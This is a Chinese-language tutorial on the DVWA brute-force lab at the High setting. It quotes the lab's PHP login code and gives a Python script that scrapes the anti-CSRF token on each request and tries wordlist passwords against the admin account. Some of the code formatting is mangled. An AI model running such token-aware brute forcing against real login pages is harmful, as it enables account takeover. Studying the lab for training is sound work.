DVWA實驗之Brute Force（暴力破解）- High

DVWA實驗之Brute Force（暴力破解）- High

 

有關DVWA環境搭建的教程請參考：

http://www.javashuo.com/article/p-cxwvtwzi-bz.html

 

 

Brute Force，即暴力（破解），是指黑客利用密碼字典，使用窮舉法猜解出用戶口令，是如今最爲普遍使用的攻擊手法之一。

 

這裏咱們先將安全等級設爲 High

 

這裏咱們開始高級實驗~

 

服務器端核心代碼

 

<?php
 
if(isset($_GET['Login'])){
//CheckAnti-CSRFtoken
checkToken($_REQUEST['user_token'],$_SESSION['session_token'],'index.php');
 
//Sanitiseusernameinput
$user=$_GET['username'];
$user=stripslashes($user);
$user=mysql_real_escape_string($user);
 
//Sanitisepasswordinput
$pass=$_GET['password'];
$pass=stripslashes($pass);
$pass=mysql_real_escape_string($pass);
$pass=md5($pass);
 
//Checkdatabase
$query="SELECT*FROM`users`WHEREuser='$user'ANDpassword='$pass';";
$result=mysql_query($query)ordie('<pre>'.mysql_error().'</pre>');
 
if($result&&mysql_num_rows($result)==1){
//Getusersdetails
$avatar=mysql_result($result,0,"avatar");
 
//Loginsuccessfulecho"<p>Welcometothepasswordprotectedarea{$user}</p>";
echo"<imgsrc="{$avatar}"/>";
}
else{
//Loginfailed
sleep(rand(0,3));
echo"<pre><br/>Usernameand/orpasswordincorrect.</pre>";
}
 
mysql_close();
}
 
//GenerateAnti-CSRFtoken
generateSessionToken();
 
?>
 

 

 

代碼解讀：

1. High級別的代碼加入了Token，能夠抵禦CSRF攻擊

2.增長了爆破的難度

3. High級別的代碼中，使用了stripslashes（去除字符串中的反斜線字符,若是有兩個連續的反斜線,則只去掉一個）、 mysql_real_escape_string對參數username、password進行過濾、轉義，進一步抵禦sql注入

 

抓個包分析一下：

 

能夠看到，登陸驗證時提交了四個參數：username、password、Login以及user_token

每次服務器返回的登錄頁面中都會包含一個隨機的user_token的值，用戶每次登陸時都要將user_token一塊兒提交。服務器收到請求後，會優先作token的檢查，再進行sql查詢。

 

 

 

 

 

 

（stripslashes（去除字符串中的反斜線字符,若是有兩個連續的反斜線,則只去掉一個）、 mysql_real_escape_string對參數username、password進行過濾、轉義，進一步抵禦sql注入）

 

因爲加入了Anti-CSRFtoken預防無腦爆破，就不使用burpsuite啦~

 

 

參考大佬寫的腳本

 

from bs4 import BeautifulSoup
import urllib2
header={ 'Host': '192.168.xxx.xxx', //目標主機（DVWA）的ip
'Cache-Control': 'max-age=0',
'If-None-Match': "307-52156c6a290c0",
'If-Modified-Since': 'Mon, 05 Oct 2015 07:51:07 GMT',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36',
'Accept': '*/*',
'Referer': 'http://192.168.xxx.xxx/dvwa/vulnerabilities/brute/index.php',
'Accept-Encoding': 'gzip, deflate, sdch',
'Accept-Language': 'zh-CN,zh;q=0.8',
'Cookie': 'security=high; PHPSESSID=5re92j36t4f2k1gvnqdf958bi2'}
requrl = "http://192.168.xxx.xxx/dvwa/vulnerabilities/brute/"
 
def get_token(requrl,header):
req = urllib2.Request(url=requrl,headers=header)
response = urllib2.urlopen(req)
print response.getcode(),
the_page = response.read()
print len(the_page)
soup = BeautifulSoup(the_page,"html.parser")
user_token = soup.form.input.input.input.input["value"] #get the user_token
return user_token
 
user_token = get_token(requrl,header)
i=0for line in open("rkolin.txt"):
requrl = "http://192.168.xxx.xxx/dvwa/vulnerabilities/brute/"+"?username=admin&password="+line.strip()+"&Login=Login&user_token="+user_token
i = i+1
print i,'admin',line.strip(),
user_token = get_token(requrl,header)
if (i == 10):
break

 

 

get_token的功能是經過python的BeautifulSoup庫從html頁面中抓取user_token的值。

 

 

 

對比結果看到，密碼爲password時返回的長度不太同樣，手工驗證，登陸成功，爆破完成。

 

 

 

 

 

 

 

 

參考資料：

 

 

https://www.cnblogs.com/pinocchioatbeijing/archive/2012/03/20/2407869.html